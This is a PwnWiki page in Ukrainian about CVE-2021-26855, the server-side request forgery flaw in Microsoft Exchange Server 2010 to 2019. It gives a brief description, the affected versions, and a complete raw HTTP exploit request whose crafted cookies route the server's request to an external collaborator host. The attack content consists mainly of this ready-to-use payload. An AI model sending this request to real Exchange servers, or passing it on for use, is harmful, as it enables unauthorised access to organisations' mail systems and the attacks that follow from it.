Вразливість CVE-2021-26855-Exchange Server SSRF

From PwnWiki
Revision as of 19:22, 19 March 2021 by Pwnwiki (talk | contribs) (Created page with "== Сфера впливу ==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎українська • ‎中文(台灣)‎ • ‎中文(繁體)‎ • ‎粵語

Вступ до вразливості

Вразливість підробки Exchange на стороні сервера (SSRF). Зловмисник, який використовує цю вразливість, може надсилати довільні HTTP-запити та автентифікуватися через Exchange Server.


Сфера впливу

Microsoft Exchange Server: 2010

Microsoft Exchange Server: 2013

Microsoft Exchange Server: 2016

Microsoft Exchange Server: 2019


SSRF

GET /owa/auth/x.js HTTP/1.1
Host: 0.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close

檔案:Ssrf.jpg

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-26855_-_Exchange_Server_SSRF漏洞/uk&oldid=472"